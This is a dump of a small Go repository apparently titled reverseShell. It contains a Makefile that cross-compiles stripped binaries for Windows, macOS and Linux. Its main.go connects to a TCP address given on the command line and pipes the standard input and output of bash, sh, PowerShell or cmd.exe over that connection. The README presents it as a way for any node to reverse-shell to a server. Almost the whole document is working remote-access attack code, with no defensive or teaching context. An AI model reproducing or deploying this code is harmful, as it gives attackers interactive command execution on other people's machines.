├── .gitignore ├── Makefile ├── README.md ├── go.mod ├── main.go ├── reverseShell.go ├── reverseShell_darwin.go ├── reverseShell_linux.go └── reverseShell_windows.go /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | *.exe 3 | *.exe~ 4 | *.dll 5 | *.so 6 | *.dylib 7 | 8 | # Test binary, built with `go test -c` 9 | *.test 10 | 11 | # Output of the go coverage tool, specifically when used with LiteIDE 12 | *.out 13 | 14 | # Dependency directories (remove the comment below to include it) 15 | # vendor/ 16 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | EXE = reverseShell 2 | SRC = . 3 | LDFLAGS = -ldflags="-s -w" 4 | 5 | windows: 6 | GOOS=windows go build -o $(EXE)_win.exe $(LDFLAGS) $(SRC) 7 | 8 | macos: 9 | GOOS=darwin go build -o $(EXE)_macos $(LDFLAGS) $(SRC) 10 | 11 | linux: 12 | GOOS=linux go build -o $(EXE)_linux $(LDFLAGS) $(SRC) 13 | 14 | all: windows macos linux 15 | echo "done." 16 | 17 | clean: 18 | rm -f $(EXE)_win.exe $(EXE)_macos $(EXE)_linux 19 | 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # reverseShell 2 | reverse Shell 3 | 4 | # What is he in the future? 5 | 6 | Allow any node to revse shell to one port of a server at the same time 7 | 8 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/hktalent/reverseShell 2 | 3 | go 1.18 4 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "io" 5 | "log" 6 | "net" 7 | "os" 8 | ) 9 | 10 | func main() { 11 | send := make(chan []byte) 12 | recv := make(chan []byte) 13 | conn, err := net.Dial("tcp", os.Args[1]) 14 | if nil == err { 15 | defer conn.Close() 16 | shellPath := GetSystemShell() 17 | go reverseShell(shellPath, send, recv) 18 | go func() { 19 | for { 20 | data := make([]byte, readBufSize) 21 | read, err := conn.Read(data) 22 | if err != nil { 23 | if err != io.EOF { 24 | log.Printf("conn.Read is err: %v \n", err) 25 | } 26 | continue 27 | } 28 | if 0 < read { 29 | recv <- data 30 | } 31 | } 32 | }() 33 | } else { 34 | log.Printf("net.Dial is err: %v \n", err) 35 | } 36 | for { 37 | select { 38 | case outgoing := <-send: 39 | // 包装自定义协议 40 | conn.Write(outgoing) 41 | } 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /reverseShell.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "log" 5 | "os" 6 | "os/exec" 7 | ) 8 | 9 | const ( 10 | // Read buffer 11 | readBufSize = 128 12 | ) 13 | 14 | func exists(path string) bool { 15 | _, err := os.Stat(path) 16 | if err == nil { 17 | return true 18 | } 19 | if os.IsNotExist(err) { 20 | return false 21 | } 22 | return true 23 | } 24 | 25 | // ReverseShell - Execute a reverse shell to host 26 | func reverseShell(command string, send chan<- []byte, recv <-chan []byte) { 27 | var cmd *exec.Cmd 28 | cmd = exec.Command(command) 29 | 30 | stdin, _ := cmd.StdinPipe() 31 | stdout, _ := cmd.StdoutPipe() 32 | stderr, _ := cmd.StderrPipe() 33 | 34 | go func() { 35 | for { 36 | select { 37 | case incoming := <-recv: 38 | log.Printf("[*] shell stdin write: %v", incoming) 39 | stdin.Write(incoming) 40 | } 41 | } 42 | }() 43 | 44 | go func() { 45 | for { 46 | buf := make([]byte, readBufSize) 47 | stderr.Read(buf) 48 | log.Printf("[*] shell stderr read: %v", buf) 49 | send <- buf 50 | } 51 | }() 52 | 53 | cmd.Start() 54 | for { 55 | buf := make([]byte, readBufSize) 56 | stdout.Read(buf) 57 | log.Printf("[*] shell stdout read: %v", buf) 58 | send <- buf 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /reverseShell_darwin.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | const ( 4 | // Shell constants 5 | bash = "/bin/bash" 6 | sh = "/bin/sh" 7 | ) 8 | 9 | func GetSystemShell() string { 10 | if exists(bash) { 11 | return bash 12 | } 13 | return sh 14 | } 15 | -------------------------------------------------------------------------------- /reverseShell_linux.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | const ( 4 | // Shell constants 5 | bash = "/bin/bash" 6 | sh = "/bin/sh" 7 | ) 8 | 9 | func GetSystemShell() string { 10 | if exists(bash) { 11 | return bash 12 | } 13 | return sh 14 | } 15 | -------------------------------------------------------------------------------- /reverseShell_windows.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | const ( 4 | // Shell constants 5 | commandPrompt = "C:\\Windows\\System32\\cmd.exe" 6 | powerShell = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" 7 | ) 8 | 9 | func GetSystemShell() string { 10 | if exists(powerShell) { 11 | return powerShell 12 | } 13 | return commandPrompt 14 | } 15 | --------------------------------------------------------------------------------